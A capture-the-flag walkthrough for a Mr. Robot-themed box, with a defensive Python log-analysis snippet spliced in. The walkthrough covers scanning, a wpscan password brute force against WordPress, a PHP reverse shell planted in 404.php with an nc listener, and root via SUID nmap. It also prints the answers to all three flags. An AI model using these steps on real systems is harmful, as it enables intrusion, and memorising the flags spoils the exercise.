Based on the Mr. Robot show, can you root this box?
scan the machine
nmap -sS -sV -sC -T4 10.10.176.209
view the webpage: it shows a Mr. Robot-style terminal and a list of commands for you to try
view source
this makes me think of Mr. Robot, so let's check robots.txt
we have a dictionary file, fsocity.dic, which may be a list of passwords for later, and our flag 1
| Flag | key-1-of-3.txt |
|---|---|
| Answer | 073403c8a58a1f80d943455fb30724b9 |
enumerate the directories of the webpage
gobuster dir -u http://10.10.176.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
it seems to be a WordPress site, and there is a wp-login panel
after some research, i know that Mr. Robot's name is Elliot, so i think that's our username
before doing a bruteforce: the given wordlist contains 858,161 lines, so let's sort it and remove the duplicates
sort fsocity.dic | uniq > sorted_fsociety.dic
now you can bruteforce the credentials using hydra, but i will use wpscan to attack this WordPress site
wpscan --url http://10.10.176.209/wp-login -U elliot -P sorted_fsociety.dic -t 30
we have now successfully gained access to the WordPress panel
now upload a PHP reverse shell to gain access to the box
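As an added, defender-side example (not part of the original writeup): a login bruteforce like the one above leaves a very recognisable trace in the web server's access log. This Python snippet scans constructed Apache combined-format lines, flags clients that hammer wp-login.php inside a short window, and notes whether a 302 (WordPress's response to a successful login) followed the run of 200s; the IPs, timestamps and User-Agent string are all made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" access-log format; method, path, status and User-Agent are what we key on.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def detect_wp_bruteforce(lines, threshold=10, window_s=60):
    """Report clients POSTing to wp-login.php more than `threshold` times in any
    `window_s`-second window. WordPress answers a failed login with 200 (form
    re-rendered) and a successful one with a 302 redirect, so a 302 from a flagged
    client means one of the guesses worked."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    total = defaultdict(int)      # ip -> all login POSTs seen from that ip
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != "/wp-login.php":
            continue
        ip, ts = m["ip"], datetime.strptime(m["ts"], TS_FMT)
        total[ip] += 1
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # slide the window forward
            q.popleft()
        if len(q) > threshold and ip not in report:
            report[ip] = {"attempts": 0, "success": False, "ua": m["ua"]}
        if ip in report:
            report[ip]["attempts"] = total[ip]
            if m["status"] == "302":
                report[ip]["success"] = True
    return report


def _line(ip, second, method, path, status, ua):
    # Build one constructed log line; every value here is made up for the demo.
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 1234 "-" "{ua}"')


# Constructed sample: a 16-request burst (15 failures, then a 302 success) from one
# client, plus a legitimate user who logs in once. The scanner UA string is invented.
SAMPLE_LOG = (
    [_line("10.0.0.5", s, "POST", "/wp-login.php", 200, "WPScan (constructed UA)") for s in range(15)]
    + [_line("10.0.0.5", 15, "POST", "/wp-login.php", 302, "WPScan (constructed UA)")]
    + [_line("192.168.1.9", 20, "GET", "/index.php", 200, "Mozilla/5.0"),
       _line("192.168.1.9", 21, "POST", "/wp-login.php", 302, "Mozilla/5.0")]
)
```

`detect_wp_bruteforce(SAMPLE_LOG)` returns only the scanner's IP, with 16 attempts and `success` set; the single legitimate login never crosses the threshold.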
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
i replace the contents of 404.php with our reverse shell, then start a listener
nc -vlnp 1234
upgrade the shell
at /home/robot, i see flag 2 and the MD5 hash of robot's password
crack the password
here you go: flag 2
| Flag | key-2-of-3.txt |
|---|---|
| Answer | 822c73956184f694993bede3eb39f959 |
find binaries with the SUID bit set
find / -perm /4000 2>/dev/null
leverage nmap, which is SUID here, to get root
nmap --interactive
!sh
| Flag | key-3-of-3.txt |
|---|---|
| Answer | 04787ddef27c3dee1ee161b21670b4e4 |